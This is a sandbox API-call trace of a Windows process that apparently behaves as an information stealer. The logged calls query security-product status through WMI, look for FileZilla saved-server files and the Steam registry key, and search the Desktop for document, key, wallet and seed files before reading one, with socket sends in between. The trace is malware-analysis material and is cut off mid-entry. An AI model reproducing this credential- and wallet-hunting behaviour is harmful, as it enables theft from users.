0x0 [0216.096] CoGetContextToken (in: pToken=0x36eec4 | out: pToken=0x36eec4) returned 0x0 [0216.096] IUnknown:QueryInterface (in: This=0x70f928, riid=0x36ef94*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee60 | out: ppvObject=0x36ee60*=0x70f928) returned 0x0 [0216.096] IUnknown:Release (This=0x70f928) returned 0x2 [0216.096] SysStringLen (param_1=0x0) returned 0x0 [0216.096] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x769078, puCount=0x36f250 | out: puCount=0x36f250*=0x2) returned 0x0 [0216.096] WbemDefPath:IWbemPath:GetText (in: This=0x769078, lFlags=4, puBuffLength=0x36f24c*=0x0, pszText=0x0 | out: puBuffLength=0x36f24c*=0x19, pszText=0x0) returned 0x0 [0216.096] WbemDefPath:IWbemPath:GetText (in: This=0x769078, lFlags=4, puBuffLength=0x36f24c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f24c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0216.096] CoGetContextToken (in: pToken=0x36f0a4 | out: pToken=0x36f0a4) returned 0x0 [0216.096] IEnumWbemClassObject:Clone (in: This=0x70f928, ppEnum=0x36f25c | out: ppEnum=0x36f25c*=0x70f9f0) returned 0x0 [0216.097] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f118 | out: ppvObject=0x36f118*=0x70f9f4) returned 0x0 [0216.098] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f168, pAuthzSvc=0x36f164, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160, pImpLevel=0x36f150, pAuthInfo=0x36f154, pCapabilites=0x36f158 | out: pAuthnSvc=0x36f168*=0xa, pAuthzSvc=0x36f164*=0x0, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160*=0x6, pImpLevel=0x36f150*=0x2, pAuthInfo=0x36f154, pCapabilites=0x36f158*=0x1) returned 0x0 [0216.098] IUnknown:Release (This=0x70f9f4) returned 0x1 [0216.098] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f10c | out: ppvObject=0x36f10c*=0x7854a4) returned 0x0 [0216.098] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0f8 | out: ppvObject=0x36f0f8*=0x70f9f4) returned 0x0 [0216.098] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.099] IUnknown:Release (This=0x70f9f4) returned 0x2 [0216.099] WbemLocator:IUnknown:Release (This=0x7854a4) returned 0x1 [0216.099] CoTaskMemFree (pv=0x794128) [0216.099] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0216.148] CoGetContextToken (in: pToken=0x36e628 | out: pToken=0x36e628) returned 0x0 [0216.148] CoGetContextToken (in: pToken=0x36ea3c | out: pToken=0x36ea3c) returned 0x0 [0216.148] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9d4 | out: ppvObject=0x36e9d4*=0x78548c) returned 0x0 [0216.148] WbemLocator:IRpcOptions:Query (in: This=0x78548c, pPrx=0x5e86550, dwProperty=2, pdwValue=0x36eac8 | out: pdwValue=0x36eac8) returned 0x80004002 [0216.148] WbemLocator:IUnknown:Release (This=0x78548c) returned 0x2 [0216.148] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0216.148] CoGetContextToken (in: pToken=0x36ef6c | out: pToken=0x36ef6c) returned 0x0 [0216.148] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36f03c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ef08 | out: ppvObject=0x36ef08*=0x70f9f0) returned 0x0 [0216.148] IUnknown:Release (This=0x70f9f0) returned 0x2 [0216.149] SysStringLen (param_1=0x0) returned 0x0 [0216.149] IEnumWbemClassObject:Reset (This=0x70f9f0) returned 0x0 [0216.195] CoTaskMemAlloc (cb=0x4) returned 0x5e893e0 [0216.195] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e893e0, puReturned=0x246f9e0 | out: apObjects=0x5e893e0*=0x0, puReturned=0x246f9e0*=0x0) returned 0x1 [0216.196] CoTaskMemFree (pv=0x5e893e0) [0216.196] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0216.196] IUnknown:Release (This=0x70f9f0) returned 0x1 [0216.196] IUnknown:Release (This=0x70f9f0) returned 0x0 [0216.197] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0216.197] IUnknown:Release (This=0x70f928) returned 0x1 [0216.197] IUnknown:Release (This=0x70f928) returned 0x0 [0216.206] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0xd5dd8fb8, Data2=0xb78d, Data3=0x4711, Data4=([0]=0x93, [1]=0x70, [2]=0x9c, [3]=0xce, [4]=0x63, [5]=0x81, [6]=0x76, [7]=0xb3))) returned 0x0 [0216.206] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0xde6d72f, Data2=0xcec3, Data3=0x490e, Data4=([0]=0xa0, [1]=0xa4, [2]=0x51, [3]=0x60, [4]=0x44, [5]=0xf8, [6]=0x5a, [7]=0x13))) returned 0x0 [0216.206] send (s=0x264, buf=0x2466bd3*, len=191, flags=0) returned 191 [0216.207] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 125 [0216.252] CoTaskMemAlloc (cb=0x20c) returned 0x5e8a9c8 [0216.252] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5e8a9c8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0216.252] CoTaskMemFree (pv=0x5e8a9c8) [0216.252] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x36ed38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0216.253] CoTaskMemAlloc (cb=0x20c) returned 0x5e8a9c8 [0216.253] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5e8a9c8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0216.253] CoTaskMemFree (pv=0x5e8a9c8) [0216.253] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x36ed38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0216.253] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\recentservers.xml", nBufferLength=0x105, lpBuffer=0x36edd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\recentservers.xml", lpFilePart=0x0) returned 0x3e [0216.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f010) returned 1 [0216.253] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\filezilla\\recentservers.xml"), fInfoLevelId=0x0, lpFileInformation=0x36f2d4 | out: lpFileInformation=0x36f2d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f00c) returned 1 [0216.254] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\sitemanager.xml", nBufferLength=0x105, lpBuffer=0x36edd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\sitemanager.xml", lpFilePart=0x0) returned 0x3c [0216.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f010) returned 1 [0216.254] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\filezilla\\sitemanager.xml"), fInfoLevelId=0x0, lpFileInformation=0x36f2d4 | out: lpFileInformation=0x36f2d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f00c) returned 1 [0216.258] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0x91de61a2, Data2=0x5a30, Data3=0x4d22, Data4=([0]=0xa0, [1]=0x56, [2]=0xa6, [3]=0xcc, [4]=0x5d, [5]=0x31, [6]=0xa9, [7]=0x88))) returned 0x0 [0216.258] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0x8929381e, Data2=0x823, Data3=0x4e02, Data4=([0]=0xb8, [1]=0x41, [2]=0x67, [3]=0x57, [4]=0xc7, [5]=0x5d, [6]=0x28, [7]=0x46))) returned 0x0 [0216.259] send (s=0x264, buf=0x2466bd3*, len=167, flags=0) returned 167 [0216.259] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 128 [0216.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Valve\\Steam", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f268 | out: phkResult=0x36f268*=0x0) returned 0x2 [0216.327] CoCreateGuid (in: pguid=0x36efb8 | out: pguid=0x36efb8*(Data1=0xcdce133, Data2=0xc29f, Data3=0x44f2, Data4=([0]=0x84, [1]=0xd5, [2]=0x33, [3]=0xa4, [4]=0xfc, [5]=0x6, [6]=0x92, [7]=0x83))) returned 0x0 [0216.327] CoCreateGuid (in: pguid=0x36eefc | out: pguid=0x36eefc*(Data1=0x4443c86a, Data2=0x8a20, Data3=0x4c97, Data4=([0]=0x83, [1]=0xb0, [2]=0x92, [3]=0x82, [4]=0xa4, [5]=0xcc, [6]=0xd9, [7]=0xa6))) returned 0x0 [0216.327] send (s=0x264, buf=0x2466bd3*, len=162, flags=0) returned 162 [0216.328] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 129 [0216.477] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0216.477] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Desktop", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1b [0216.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.517] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0216.518] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.519] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0216.519] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fc4e60, ftCreationTime.dwHighDateTime=0x1d7e60f, ftLastAccessTime.dwLowDateTime=0xeefef560, ftLastAccessTime.dwHighDateTime=0x1d7e61f, ftLastWriteTime.dwLowDateTime=0xeefef560, ftLastWriteTime.dwHighDateTime=0x1d7e61f, nFileSizeHigh=0x0, nFileSizeLow=0x13c21, dwReserved0=0x0, dwReserved1=0x0, cFileName="h ZjNUzxRlj5Dyv.docx", cAlternateFileName="HZJNUZ~1.DOC")) returned 0x76a908 [0216.521] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6973ecc0, ftCreationTime.dwHighDateTime=0x1d7d805, ftLastAccessTime.dwLowDateTime=0xc764cfc0, ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xc764cfc0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, nFileSizeHigh=0x0, nFileSizeLow=0x2a29, dwReserved0=0x0, dwReserved1=0x0, cFileName="I0W_KuSVwDvHvdJkNgup.docx", cAlternateFileName="I0W_KU~1.DOC")) returned 1 [0216.582] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0216.582] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0216.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.583] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0216.583] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.584] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0216.584] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.584] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0216.584] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.587] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx", lpFilePart=0x0) returned 0x2f [0216.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0216.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\h zjnuzxrlj5dyv.docx"), fInfoLevelId=0x0, lpFileInformation=0x2473ddc | out: lpFileInformation=0x2473ddc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fc4e60, ftCreationTime.dwHighDateTime=0x1d7e60f, ftLastAccessTime.dwLowDateTime=0xeefef560, ftLastAccessTime.dwHighDateTime=0x1d7e61f, ftLastWriteTime.dwLowDateTime=0xeefef560, ftLastWriteTime.dwHighDateTime=0x1d7e61f, nFileSizeHigh=0x0, nFileSizeLow=0x13c21)) returned 1 [0216.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0216.588] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0216.595] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx", lpFilePart=0x0) returned 0x2f [0216.608] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx", lpFilePart=0x0) returned 0x2f [0216.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0216.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\h zjnuzxrlj5dyv.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fc4e60, ftCreationTime.dwHighDateTime=0x1d7e60f, ftLastAccessTime.dwLowDateTime=0xeefef560, ftLastAccessTime.dwHighDateTime=0x1d7e61f, ftLastWriteTime.dwLowDateTime=0xeefef560, ftLastWriteTime.dwHighDateTime=0x1d7e61f, nFileSizeHigh=0x0, nFileSizeLow=0x13c21)) returned 1 [0216.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0216.609] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx", lpFilePart=0x0) returned 0x2f [0216.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0216.609] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\h ZjNUzxRlj5Dyv.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\h zjnuzxrlj5dyv.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0216.609] GetFileType (hFile=0x354) returned 0x1 [0216.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0216.610] GetFileType (hFile=0x354) returned 0x1 [0216.656] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.658] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.658] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.659] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.659] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.659] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.660] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.660] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.661] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.661] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.662] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.663] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.663] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.663] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.664] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.664] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.665] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.665] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.665] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.665] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, 